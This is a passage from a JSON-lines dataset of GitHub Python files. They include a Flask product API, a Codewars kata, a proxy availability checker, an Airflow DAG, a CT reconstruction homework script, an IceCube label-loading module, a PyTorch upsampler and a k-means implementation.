\r\n        content = request.json\r\n        product = Product(prod_id=content['prod_id'],\r\n                        Title=content['Title'],\r\n                        Color=content['Color'],\r\n                        Price=content['Price'])\r\n        product.save()\r\n        return make_response(\"Product saved\",201)\r\n\r\n    \r\n\r\n@app.route('/api/products/<int:prod_id>',methods=['GET','PUT','DELETE'])\r\ndef api_each_prod(prod_id):\r\n    \r\n    if request.method == \"GET\":\r\n        product_obj = Product.objects(prod_id=prod_id).first()\r\n        return make_response(jsonify(product_obj.to_json()),200)\r\n    \r\n\r\n    \r\n    elif request.method == \"PUT\":\r\n        product_obj = Product.objects(prod_id=prod_id).first()\r\n        product_obj.update(prod_id=1,Title=\"Adidas\",Color=\"Black\",Price=\"156\")\r\n        return make_response(\"Product updated\",200)\r\n\r\n\r\n    elif request.method == \"DELETE\":\r\n        product_obj = Product.objects(prod_id=prod_id).first()\r\n        product_obj.delete()\r\n        return make_response(\"Product deleted\",200)\r\n    \r\nif __name__ == '__main__':\r\n    app.run()\r\n    \r\n","repo_name":"Haythem97/unittest_py","sub_path":"products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"30868861541","text":"## Categorize New Member\r\n## 7 kyu\r\n## https://www.codewars.com/kata/5502c9e7b3216ec63c0001aa\r\n\r\n\r\ndef openOrSenior(data):\r\n    newlist = []\r\n    for item in data:\r\n        if item[0] > 54 and item[1] > 7:\r\n            newlist.append(\"Senior\")\r\n        else:\r\n            newlist.append(\"Open\")\r\n    return newlist","repo_name":"stereoabuse/codewars","sub_path":"problems/categorize_new_member.py","file_name":"categorize_new_member.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37680686670","text":"import requests,json,time,threading\n\n\nlock=threading.Lock()\nhead = {\n    \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0\",\n\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n\"Accept-Language\":\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n\"Accept-Encoding\":\"gzip, deflate, br\"}\n\ngoodips=[]\ntestbot=[]\nbotnum=0\novernum=0\njs=[]\n\ndef test():\n    global js,head,botnum,overnum\n    while not len(js)==0:\n        testing = js.pop(0)\n        proxy={testing[\"http\"]:testing[\"IP\"]}\n        try:\n            t1=time.time()\n            html = requests.head(\"http://www.baidu.com\",headers=head,proxies=proxy,timeout=10)\n            t2=time.time()\n            t=t2-t1\n            if not html.status_code == 200:\n                raise TimeoutError\n        except Exception:\n            pass\n        else:\n            goodips.append(testing)\n        finally:\n            overnum+=1\n            # time.sleep(1)\n    botnum-=1\n\n\ndef main(inPut=\"./ips.json\",outPut=\"./goodips.json\"):\n    global testing,js,botnum,overnum\n    with open(inPut,\"r\")as file:\n        js=json.load(file)\n    ipnum = len(js)\n    print(\"Total:\",len(js),\"proxies\")\n\n    for i in range(256):\n        testbot.append(threading.Thread(target=test))\n        botnum+=1\n\n    for i in testbot:\n        i.setDaemon(True)\n    \n    for i in testbot:\n        i.start()\n\n    while not botnum==0:\n        percentage =int((overnum / ipnum)*100)\n        print(\" [\"+\"▉\"*percentage+\"-\"*(100-percentage)+\"]\"+str(percentage)+\"% \"\\\n              +\"checked \"+str(overnum)+\"/\"+str(ipnum)+\", \"\\\n              +str(len(goodips))+\" usable\",end=\"\\r\")\n    \n    with open(outPut,\"w\")as file:\n        json.dump(goodips,fp=file)\n\n    print(\"\\ndone\")\n    print(\"Total usable:\",len(goodips))\n\nif __name__ == \"__main__\":\n
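    # entry point: load ips.json, test every proxy, then write goodips.json\n    main()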
","repo_name":"lesiwo/get-requests-proxy-python","sub_path":"testip2.py","file_name":"testip2.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31459268193","text":"i=0\n\naccumuX=0\naccumuY=0\n\nwhile i in range(0,2):# Loop that asks twice for the x and y positions, then subtracts them to find the distance between the two points\n    x=int(input(str((i+1))+\". value of x: \"))\n    accumuX=abs(accumuX-x)\n    y=int(input(str((i+1))+\". value of y: \"))\n    accumuY=abs(accumuY-y)\n    i=i+1\n\nprint(\"The distance between them is \"+str(accumuX)+\"x\"+str(accumuY)+\"y\")# Message with the result","repo_name":"BPA-SER-2223/Programacion_DAM","sub_path":"Practica 3/Ejercicio12.py","file_name":"Ejercicio12.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19183318694","text":"def dosomething(x):\n    if x == 5:\n        print('Fifth')\n    else:\n        print('Hell')\n\n    if x == 7:\n        print('Seventh')\n    else:\n        print('Heaven')\n\n\nimport dis\ndis.dis(dosomething)\n\n# How hard is it to test (and understand) this function?\n# https://en.wikipedia.org/wiki/Cyclomatic_complexity\ncomplexity = 1\nfor i in dis.get_instructions(dosomething):\n    complexity += int('JUMP_IF' in i.opname or 'FOR_ITER' == i.opname)\n\nprint(complexity)\n\n# 7 is usually considered a threshold over which we should split the function\nif complexity > 7:\n    print('You should refactor!')\n","repo_name":"amol-/blackhole","sub_path":"02_cyclomatic.py","file_name":"02_cyclomatic.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"17299369214","text":"from airflow import DAG,Dataset\nfrom airflow.decorators import task\n\nfrom datetime import datetime\n\nfile= Dataset(\"/tmp/new_file.csv\")\n\nwith DAG (\n    dag_id=\"dataset_producer\",\n    schedule=\"@daily\",\n    start_date=datetime(2023,1,1),\n    catchup=False):\n    \n    @task(outlets=[file])\n    def update_data():\n        with open(file.uri, \"a+\") as f:\n            f.write(\"new data\")\n    \n    update_data()","repo_name":"technoavengers/airflow-training","sub_path":"dags/datasets/dataset_producer_dag.py","file_name":"dataset_producer_dag.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37207238764","text":"from os.path import join\nimport pyelsa as elsa\nimport aomip\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.image as mig\nimport utils\n\n## Prepare data\nlocal=True\n\ndata_path = '/srv/ceph/share-all/aomip/2686726_Walnut1/Walnut1/Projections/tubeV1'\nprojs_name = 'scan_{:06}.tif'\ndark_name = 'di000000.tif'\nflat_name = ['io000000.tif', 'io000001.tif']\nvecs_name = 'scan_geom_corrected.geom'\nprojs_rows = 972\nprojs_cols = 768\n\n# projection file indices, we need to read in the projection in reverse order due to the portrait mode acquisition\nprojs_idx = range(1200,0, -1)\n\nnum_projections = 1200 #vecs.shape[0]\n\n# create the numpy array which will receive projection data from tiff files\nprojs = np.zeros((num_projections, projs_rows, projs_cols), dtype=np.float32)\n\n# Changing orientation from landscape to portrait mode\ntrafo = lambda image : np.transpose(np.flipud(image))\n\n# load flat-field and dark-fields\n
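# (Reference note, not applied in this snippet: a standard flat-field\n# correction combines these as corrected = -log((proj - dark) / (flat - dark)),\n# following the Beer-Lambert law.)\n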
# there are two flat-field images (taken before and after acquisition), we simply average them\ndark = trafo(plt.imread(join(data_path, dark_name)))\nflat = np.zeros((2, projs_rows, projs_cols), dtype=np.float32)\n\n# Combine average of the flat field images\nfor i, fn in enumerate(flat_name):\n    flat[i] = trafo(plt.imread(join(data_path, fn)))\nflat = np.mean(flat,axis=0)\n\n# load projection data\nfor i in range(num_projections):\n    projs[i] = trafo(plt.imread(join(data_path, projs_name.format(projs_idx[i]))))\n\n\"\"\" Homework 1: preprocessing with slicing\"\"\"\n\"\"\" Start \"\"\"\n\nslice_idx_50 = 50\nslice_idx_100 = 100\nslice_idx_200 = 200\nslice_idx_400 = 400\nslice_idx_800 = 800\n\nsliced_sinogram_50 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_100 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_200 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_400 = np.empty((num_projections, projs_cols), dtype=np.float32)\nsliced_sinogram_800 = np.empty((num_projections, projs_cols), dtype=np.float32)\n\nfor i in range(num_projections):\n    proj=projs[i]\n    \n    #slice row 50 for every projection\n    row_50 = proj[slice_idx_50, :]\n    sliced_sinogram_50[i, :] = row_50\n    \n    #slice row 100 for every projection\n    row_100 = proj[slice_idx_100, :]\n    sliced_sinogram_100[i, :] = row_100\n    \n    #slice row 200 for every projection\n    row_200 = proj[slice_idx_200, :]\n    sliced_sinogram_200[i, :] = row_200\n    \n    #slice row 400 for every projection\n    row_400 = proj[slice_idx_400, :]\n    sliced_sinogram_400[i, :] = row_400\n    \n    #slice row 800 for every projection\n    row_800 = proj[slice_idx_800, :]\n    sliced_sinogram_800[i, :] = row_800\n\n# use a distinct filename per slice so the images are not overwritten\nutils.save_array_as_image(sliced_sinogram_50,'sliced_sinogram_50.png','Img')\nutils.save_array_as_image(sliced_sinogram_100,'sliced_sinogram_100.png','Img')\nutils.save_array_as_image(sliced_sinogram_200,'sliced_sinogram_200.png','Img')\nutils.save_array_as_image(sliced_sinogram_400,'sliced_sinogram_400.png','Img')\nutils.save_array_as_image(sliced_sinogram_800,'sliced_sinogram_800.png','Img')\n\n\"\"\" End \"\"\"\n\n\"\"\" Homework 3: Solving CT Problems \"\"\"\n\"\"\" Start \"\"\"\n\ndef f(A,b,x):\n    return 0.5* np.linalg.norm(A.dot(x) - b)**2\n\ndef gradientDescent(function,A,b, x0, iterations):\n    x = x0\n    history = np.zeros((x0.size, iterations+1))\n    history[:, 0] = x0\n    \n    value0 = function(A,b,x0)\n    values = np.zeros(iterations+1)\n    values[0] = value0\n    \n    for i in range(iterations):\n        d = A.T.dot(A.dot(x)-b)\n        # exact line search for 0.5*||Ax-b||^2: alpha = (d.d) / ||A d||^2\n        Ad = A.dot(d)\n        alpha = d.dot(d) / Ad.dot(Ad)\n        x = x - alpha*d\n        history[:,i+1] = x\n        values[i+1] = function(A,b,x)\n    \n    return history, values\n\nsize = (projs_rows,projs_cols)\nA = aomip.XrayOperator(size, [721], np.linspace(0, 360, projs_cols), size[0]*100, size[0]*2)\nb = sliced_sinogram_200.flatten()\ninitial_x0 = np.array(np.zeros(projs_rows*projs_cols))\niteration = 100\nhist, minv = gradientDescent(f,A,b,initial_x0,iteration)\n# iterates are stored column-wise, so select the final column\nxreconstructed = (hist[:, iteration]).reshape(size)\nutils.save_array_as_image(xreconstructed,'reconstructed_sinogram_200.png','Img')\n
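\n# Illustrative sanity check (not part of the original script): the objective\n# values returned by gradientDescent should be non-increasing, e.g.\n# assert np.all(np.diff(minv) <= 1e-6)\n\n\"\"\" End \"\"\"","repo_name":"kzboey/Applied-Optimization-for-Inverse-Problem","sub_path":"aomip-boey-kai-zhe/homework/hw02/script_old.py","file_name":"script_old.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24819403932","text":"from __future__ import division, print_function\n\nimport logging\nimport numpy as np\nimport pandas as 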
pd\n\nfrom egenerator import misc\nfrom egenerator.manager.component import BaseComponent, Configuration\nfrom egenerator.data.tensor import DataTensorList, DataTensor\nfrom egenerator.utils.cascades import shift_to_maximum\n\n\nclass SnowstormTrackGeneratorLabelModule(BaseComponent):\n\n \"\"\"This is a label module that loads the snowstorm track labels.\n \"\"\"\n\n def __init__(self, logger=None):\n \"\"\"Initialize track module\n\n Parameters\n ----------\n logger : logging.logger, optional\n A logging instance.\n \"\"\"\n\n logger = logger or logging.getLogger(__name__)\n super(SnowstormTrackGeneratorLabelModule, self).__init__(\n logger=logger)\n\n def _configure(self, config_data, shift_cascade_vertex, trafo_log,\n float_precision,\n num_cascades=5,\n label_key='EventGeneratorMuonTrackLabels',\n snowstorm_key='SnowstormParameters',\n num_snowstorm_params=30):\n \"\"\"Configure Module Class\n This is an abstract method and must be implemented by derived class.\n\n Parameters\n ----------\n config_data : None, str, or DataTensorList\n This is either the path to a test file or a data tensor list\n object. The module will be configured with this.\n shift_cascade_vertex : bool\n Shift cascade vertex to shower maximum instead of interaction\n point.\n trafo_log : None or bool or list of bool\n Whether or not to apply logarithm on parameters.\n If a single bool is given, this applies to all labels. Otherwise\n a list of bools corresponds to the labels in the order:\n zenith, azimuth,\n track_anchor_x, track_anchor_y, track_anchor_z,\n track_anchor_time, track_energy,\n track_distance_start, track_distance_end,\n track_stochasticity,\n cascade_0000_energy,\n cascade_{i:04d}_energy, cascade_{i:04d}_distance,\n Snowstorm parameters must not be defined here. No logarithm will be\n applied to the snowstorm parameters.\n float_precision : str\n The float precision as a str.\n num_cascades : int, optional\n Number of cascades along the track.\n label_key : str, optional\n The name of the key under which the labels are saved.\n snowstorm_key : str, optional\n The name of the key under which the snowstorm parameters are saved.\n If `snowstorm_key` is None, no snowstorm parameters will be loaded.\n Instead a default value of 1. will be assigned to each of the\n `num_snowstorm_params` number of snowstorm parameters.\n num_snowstorm_params : int, optional\n The number of varied snowstorm parameters.\n\n Returns\n -------\n Configuration object\n The configuration object of the newly configured component.\n This does not need to include configurations of sub components\n which are passed directly as parameters into the configure method,\n as these are automatically gathered. Components passed as lists,\n tuples, and dicts are also collected, unless they are nested\n deeper (list of list of components will not be detected).\n The dependent_sub_components may also be left empty for these\n passed and detected sub components.\n Deeply nested sub components or sub components created within\n (and not directly passed as an argument to) this component\n must be added manually.\n Settings that need to be defined are:\n class_string:\n misc.get_full_class_string_of_object(self)\n settings: dict\n The settings of the component.\n mutable_settings: dict, default={}\n The mutable settings of the component.\n check_values: dict, default={}\n Additional check values.\n dict\n The data of the component. 
Contains:\n                'label_tensors': DataTensorList\n                    The tensors of type 'label' that will be loaded.\n            dict\n                A dictionary of dependent sub components. This is a dictionary\n                of sub components that need to be saved and loaded recursively\n                when the component is saved and loaded.\n                Return None if no dependent sub components exist.\n\n        Raises\n        ------\n        TypeError\n            Description\n        ValueError\n            Description\n        \"\"\"\n\n        # sanity checks:\n        if not isinstance(shift_cascade_vertex, bool):\n            raise TypeError('{!r} is not a boolean value!'.format(\n                shift_cascade_vertex))\n        if num_cascades < 0:\n            raise ValueError('Num cascades {} must not be negative!'.format(\n                num_cascades))\n\n        # compute number of parameters\n        if num_cascades == 0:\n            num_params = 10\n        elif num_cascades == 1:\n            num_params = 11\n        else:\n            num_params = 11 + (num_cascades - 1) * 2\n\n        # create list of parameter names which is needed for data loading\n        parameter_names = [\n            'zenith', 'azimuth',\n            'track_anchor_x', 'track_anchor_y', 'track_anchor_z',\n            'track_anchor_time', 'track_energy',\n            'track_distance_start', 'track_distance_end',\n            'track_stochasticity',\n        ]\n        if num_cascades >= 1:\n            parameter_names.append('cascade_0000_energy')\n\n        if num_cascades > 1:\n            for i in range(1, num_cascades):\n                parameter_names.append('cascade_{:04d}_energy'.format(i))\n                parameter_names.append('cascade_{:04d}_distance'.format(i))\n\n        parameter_dict = {}\n        for i, parameter_name in enumerate(parameter_names):\n            parameter_dict[parameter_name] = i\n\n        # extend trafo log for snowstorm parameters: fill with False\n        if isinstance(trafo_log, bool):\n            trafo_log_ext = [trafo_log] * num_params\n        else:\n            trafo_log_ext = list(trafo_log)\n        trafo_log_ext.extend([False]*num_snowstorm_params)\n\n        data = {\n            'parameter_dict': parameter_dict,\n            'parameter_names': parameter_names,\n        }\n        data['label_tensors'] = DataTensorList([DataTensor(\n            name='x_parameters',\n            shape=[None, num_params + num_snowstorm_params],\n            tensor_type='label',\n            dtype=float_precision,\n            trafo=True,\n            trafo_log=trafo_log_ext)])\n\n        if isinstance(config_data, DataTensorList):\n            if config_data != data['label_tensors']:\n                msg = 'Tensors are wrong: {!r} != {!r}'\n                raise ValueError(msg.format(config_data,\n                                            data['label_tensors']))\n        configuration = Configuration(\n            class_string=misc.get_full_class_string_of_object(self),\n            settings=dict(config_data=config_data,\n                          shift_cascade_vertex=shift_cascade_vertex,\n                          trafo_log=trafo_log,\n                          float_precision=float_precision,\n                          num_cascades=num_cascades,\n                          label_key=label_key,\n                          snowstorm_key=snowstorm_key,\n                          num_snowstorm_params=num_snowstorm_params))\n        return configuration, data, {}\n\n    def get_data_from_hdf(self, file, *args, **kwargs):\n        \"\"\"Get label data from hdf file.\n\n        Parameters\n        ----------\n        file : str\n            The path to the hdf file.\n        *args\n            Variable length argument list.\n        **kwargs\n            Arbitrary keyword arguments.\n\n        Returns\n        -------\n        int\n            Number of events.\n        tuple of array-like tensors or None\n            The input data (array-like) as specified in the\n            DataTensorList (self.tensors).\n            Returns None if no label data is loaded.\n\n        Raises\n        ------\n        ValueError\n            Description\n        \"\"\"\n        if not self.is_configured:\n            raise ValueError('Module not configured yet!')\n\n        # open file\n        f = pd.HDFStore(file, 'r')\n\n        track_parameters = []\n        try:\n            _labels = f[self.configuration.config['label_key']]\n            for l in self.data['parameter_names']:\n                track_parameters.append(_labels[l])\n\n            snowstorm_key = self.configuration.config['snowstorm_key']\n            
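# snowstorm systematics are appended after the physics labels\n            num_params = 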
self.configuration.config['num_snowstorm_params']\n num_events = len(track_parameters[0])\n\n if num_params > 0:\n if snowstorm_key is not None:\n _snowstorm_params = f[snowstorm_key]\n params = _snowstorm_params['item']\n index = _snowstorm_params['vector_index']\n assert max(index) == num_params - 1\n assert min(index) == 0\n\n for i in range(num_params):\n\n snowstorm_param = params[index == i]\n assert len(snowstorm_param) == num_events\n track_parameters.append(snowstorm_param)\n\n else:\n # No Snowstorm key is provided: add dummy values\n for i in range(num_params):\n track_parameters.append(np.ones(num_events))\n\n except Exception as e:\n self._logger.warning(e)\n self._logger.warning('Skipping file: {}'.format(file))\n return None, None\n finally:\n f.close()\n\n # shift cascade vertices to shower maximum?\n if self.configuration.config['shift_cascade_vertex']:\n track_parameters = self._shift_parameters(track_parameters)\n\n # format track parameters\n dtype = getattr(np, self.configuration.config['float_precision'])\n track_parameters = np.array(track_parameters, dtype=dtype).T\n num_events = len(track_parameters)\n\n return num_events, (track_parameters,)\n\n def get_data_from_frame(self, frame, *args, **kwargs):\n \"\"\"Get label data from frame.\n\n Parameters\n ----------\n frame : I3Frame\n The I3Frame from which to get the data.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n\n Returns\n -------\n int\n Number of events.\n tuple of array-like tensors or None\n The input data (array-like) as specified in the\n DataTensorList (self.tensors).\n Returns None if no label data is loaded.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n track_parameters = []\n try:\n _labels = frame[self.configuration.config['label_key']]\n for l in self.data['parameter_names']:\n track_parameters.append(np.atleast_1d(_labels[l]))\n\n snowstorm_key = self.configuration.config['snowstorm_key']\n num_params = self.configuration.config['num_snowstorm_params']\n num_events = len(track_parameters[0])\n\n if num_params > 0:\n if snowstorm_key is not None:\n _snowstorm_params = frame[snowstorm_key]\n assert len(_snowstorm_params) == num_params\n\n for i in range(num_params):\n\n snowstorm_param = np.atleast_1d(_snowstorm_params[i])\n assert len(snowstorm_param) == num_events\n track_parameters.append(snowstorm_param)\n\n else:\n # No Snowstorm key is provided: add dummy values\n for i in range(num_params):\n track_parameters.append(np.ones(num_events))\n\n except Exception as e:\n self._logger.warning(e)\n self._logger.warning('Skipping frame: {}'.format(frame))\n return None, None\n\n # shift cascade vertices to shower maximum?\n if self.configuration.config['shift_cascade_vertex']:\n track_parameters = self._shift_parameters(track_parameters)\n\n # format track parameters\n dtype = getattr(np, self.configuration.config['float_precision'])\n track_parameters = np.array(track_parameters, dtype=dtype).T\n num_events = len(track_parameters)\n\n return num_events, (track_parameters,)\n\n def create_data_from_frame(self, frame, *args, **kwargs):\n \"\"\"Create label data from frame.\n\n Parameters\n ----------\n frame : I3Frame\n The I3Frame from which to get the data.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n\n Returns\n -------\n int\n Number of events.\n tuple of array-like tensors or None\n The input data (array-like) as specified in the\n DataTensorList (self.tensors).\n Returns 
None if no label data is created.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n return self.get_data_from_frame(frame, *args, **kwargs)\n\n def write_data_to_frame(self, data, frame, *args, **kwargs):\n \"\"\"Write label data to I3Frame.\n\n Parameters\n ----------\n data : tuple of array-like tensors\n The input data (array-like) as specified in the\n DataTensorList (self.data['data_tensors']).\n frame : I3Frame\n The I3Frame to which the data is to be written to.\n *args\n Variable length argument list.\n **kwargs\n Arbitrary keyword arguments.\n \"\"\"\n if not self.is_configured:\n raise ValueError('Module not configured yet!')\n\n pass\n\n def _shift_parameters(self, parameters):\n \"\"\"Adjust parameters due to shifting of cascades to shower maximum.\n\n Parameters\n ----------\n parameters : list of array\n The parameters that should be shifted.\n\n Returns\n -------\n list of array\n The shifted parameters\n \"\"\"\n num_cascades = self.configuration.config['num_cascades']\n param_dict = self.data['parameter_dict']\n\n zenith = parameters[param_dict['zenith']]\n azimuth = parameters[param_dict['azimuth']]\n\n c = 0.299792458 # meter / ns\n dir_x = -np.sin(zenith) * np.cos(azimuth)\n dir_y = -np.sin(zenith) * np.sin(azimuth)\n dir_z = -np.cos(zenith)\n\n # fix anchor point of track which is the first provided cascade\n # This means that the start and end distance of the track segment\n # must also be adjusted\n if num_cascades > 0:\n shift = self._get_cascade_extension(\n parameters[param_dict['cascade_0000_energy']])\n\n parameters[param_dict['track_anchor_x']] += dir_x * shift\n parameters[param_dict['track_anchor_y']] += dir_y * shift\n parameters[param_dict['track_anchor_z']] += dir_z * shift\n parameters[param_dict['track_anchor_time']] += shift / c\n\n parameters[param_dict['track_distance_start']] -= shift\n parameters[param_dict['track_distance_end']] -= shift\n\n # Also shift all of the remaining cascades\n for i in range(1, num_cascades):\n shift_i = self._get_cascade_extension(\n parameters[param_dict['cascade_{:04d}_energy'.format(i)]])\n\n # get index of cascade distance parameter\n dist_index = param_dict['cascade_{:04d}_distance'.format(i)]\n\n # we need to compensate for the shift of the anchor point\n parameters[dist_index] -= shift\n\n # and also for the shift of the ith cascade itself\n parameters[dist_index] += shift_i\n\n return parameters\n\n def _get_cascade_extension(self, ref_energy, eps=1e-6):\n \"\"\"\n PPC does its own cascade extension, leaving the showers at the\n production vertex. 
Reapply the parametrization to find the\n position of the shower maximum, which is also the best approximate\n position for a point cascade.\n\n Parameters\n ----------\n ref_energy : array_like\n Energy of cascade in GeV.\n eps : float, optional\n Small constant float.\n\n Returns\n -------\n array_like\n Distance of shower maximum to cascade vertex in meter.\n \"\"\"\n\n # Radiation length in meters, assuming an ice density of 0.9216 g/cm^3\n l_rad = (0.358/0.9216) # in meter\n\n \"\"\"\n Parameters taken from I3SimConstants (for particle e-):\n https://code.icecube.wisc.edu/projects/icecube/browser/IceCube/\n meta-projects/combo/trunk/sim-services/private/\n sim-services/I3SimConstants.cxx\n \"\"\"\n a = 2.01849 + 0.63176 * np.log(ref_energy + eps)\n b = l_rad/0.63207\n\n # Mode of the gamma distribution gamma_dist(a, b) is: (a-1.)/b\n length_to_maximum = np.clip(((a-1.)/b)*l_rad, 0., float('inf'))\n return length_to_maximum\n\n def _shift_to_maximum(self, x, y, z, zenith, azimuth, ref_energy, t,\n eps=1e-6):\n \"\"\"\n PPC does its own cascade extension, leaving the showers at the\n production vertex. Reapply the parametrization to find the\n position of the shower maximum, which is also the best approximate\n position for a point cascade.\n\n Parameters\n ----------\n x : float or np.ndarray of floats\n Cascade interaction vertex x (unshifted) in meters.\n y : float or np.ndarray of floats\n Cascade interaction vertex y (unshifted) in meters.\n z : float or np.ndarray of floats\n Cascade interaction vertex z (unshifted) in meters.\n zenith : float or np.ndarray of floats\n Cascade zenith direction in rad.\n azimuth : float or np.ndarray of floats\n Cascade azimuth direction in rad.\n ref_energy : float or np.ndarray of floats\n Energy of cascade in GeV.\n t : float or np.ndarray of floats\n Cascade interaction vertex time (unshifted) in ns.\n eps : float, optional\n Small constant float.\n\n Returns\n -------\n Tuple of float or tuple of np.ndarray\n Shifted vertex position (position of shower maximum) in meter and\n shifted vertex time in nano seconds.\n \"\"\"\n\n return shift_to_maximum(\n x=x, y=y, z=z, zenith=zenith, azimuth=azimuth,\n ref_energy=ref_energy, t=t, eps=eps, reverse=False,\n )\n","repo_name":"icecube/event-generator","sub_path":"egenerator/data/modules/labels/snowstorm_tracks.py","file_name":"snowstorm_tracks.py","file_ext":"py","file_size_in_byte":19278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"35498491580","text":"from typing import List\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Upsampler(nn.Module):\n \"\"\"Whisper to signal-level upsampler.\n \"\"\"\n def __init__(self, channels: int, kernels: int, scales: List[int], leak: float):\n \"\"\"Initializer.\n Args:\n channels: size of the input channels.\n kernels: size of the convolutional kernels.\n scales: upsampling scales.\n leak: leaky relu coefficient.\n \"\"\"\n super().__init__()\n self.scales = scales\n self.conv = nn.utils.weight_norm(\n nn.Conv1d(channels, channels, kernels, padding=kernels // 2, bias=False))\n self.upsamples = nn.ModuleList([\n nn.Sequential(\n nn.utils.weight_norm(\n nn.Conv2d(1, 1, (1, scale * 2 + 1), padding=(0, scale), bias=False)),\n nn.LeakyReLU(leak))\n for scale in scales])\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n \"\"\"Upsample the inputs.\n Args:\n inputs: [torch.float32; [B, C, T]], input tensor.\n Returns:\n [torch.float32; [B, C, T x 
prod(scales)]], upsampled.\n        \"\"\"\n        # [B, 1, C, T]\n        x = self.conv(inputs)[:, None]\n        for scale, conv in zip(self.scales, self.upsamples):\n            # [B, 1, C, T x scale]\n            x = conv(\n                F.interpolate(x, scale_factor=(1, scale), mode='nearest'))\n        # [B, C, T x prod(scales)]\n        return x.squeeze(1)\n","repo_name":"revsic/torch-whisper-guided-vc","sub_path":"wgvc/upsampler.py","file_name":"upsampler.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"3"}
+{"seq_id":"42270867697","text":"import numpy as np\nfrom numpy.linalg import norm\nimport matplotlib.pyplot as plt\n\n\nclass MyKMeans:\n    \"\"\"\n    Class that implements the k-means algorithm for clustering data\n    \"\"\"\n\n    def plot_data(self):\n        plt.scatter(self.dataset, np.zeros(len(self.dataset)))\n        plt.scatter(self.centroids, np.zeros(len(self.centroids)), marker='p', s=100,\n                    c='r', label='centroid')\n        plt.show()\n\n    def compute_centroids(self, labels, dataset, clusters):\n        self.centroids = np.zeros((self.clusters_number, dataset.shape[1]))\n        for cluster in range(clusters):  # the centroid is the mean of all the values that are in that cluster\n            self.centroids[cluster, :] = np.mean(dataset[labels == cluster, :], axis=0)\n\n    def find_closest_cluster(self, distances):\n        \"\"\"\n        Method that finds the closest centroid for each data point (one point per column)\n        :param distances:\n        :return: index of the closest centroid for each data point\n        \"\"\"\n        return np.argmin(distances, axis=0)\n\n    def compute_distances(self):\n        distances = np.zeros((self.centroids.shape[0], self.dataset.shape[0]))\n\n        for cluster in range(self.centroids.shape[0]):\n            distances[cluster, :] = np.square(norm(self.dataset - self.centroids[cluster, :], axis=1))\n\n        return distances\n\n    def initialize_centroids(self):\n        \"\"\"\n        Shuffles the dataset and selects randomly the values for the centroids\n        \"\"\"\n        shuffled_dataset = np.random.permutation(self.dataset.shape[0])  # the number of rows\n\n        return self.dataset[shuffled_dataset[:self.clusters_number]]\n\n    def train(self, iterations=100):\n        \"\"\"\n        Function that implements the kmeans clustering algorithm\n        :param iterations: number of iterations, 100 by default\n        :return: the values of the clusters computed\n        \"\"\"\n\n        for i in range(iterations):\n            old_centroids = self.centroids\n            distances = self.compute_distances()\n            labels = self.find_closest_cluster(distances)\n            print(labels)\n            self.compute_centroids(labels, self.dataset, self.clusters_number)\n            if np.all(old_centroids == self.centroids):  # if not even a single centroid has changed\n                break\n\n        return self.centroids\n\n    def __init__(self, clusters, dataset):\n        self.clusters_number = clusters\n        self.dataset = dataset\n        self.centroids = self.initialize_centroids()\n\n\nif __name__ == \"__main__\":\n    dataset = np.array([[2, 4, 3, 4, 60, 70, 80], [1, 2, 100, 2054, 30, 2600, 9504]])\n    dataset = dataset.transpose()\n    clusters = 2\n    cluster_algo = MyKMeans(clusters, dataset)\n\n
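    # Illustrative follow-up (not in the original script): per-point cluster\n    # assignments can be recovered after training with\n    # cluster_algo.find_closest_cluster(cluster_algo.compute_distances())\n    print(f\"Final centroids: {cluster_algo.train()}\")\n","repo_name":"ServoCryptid/DataMining","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33425851795","text":"import os.path\n\nimport numpy as np\nimport traceback\nimport logging\n\nfrom HSTB.kluster.gui.backends._qt import QtGui, QtCore, QtWidgets, Signal\nfrom HSTB.kluster.fqpr_project import return_project_data, reprocess_fqprs\nfrom 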
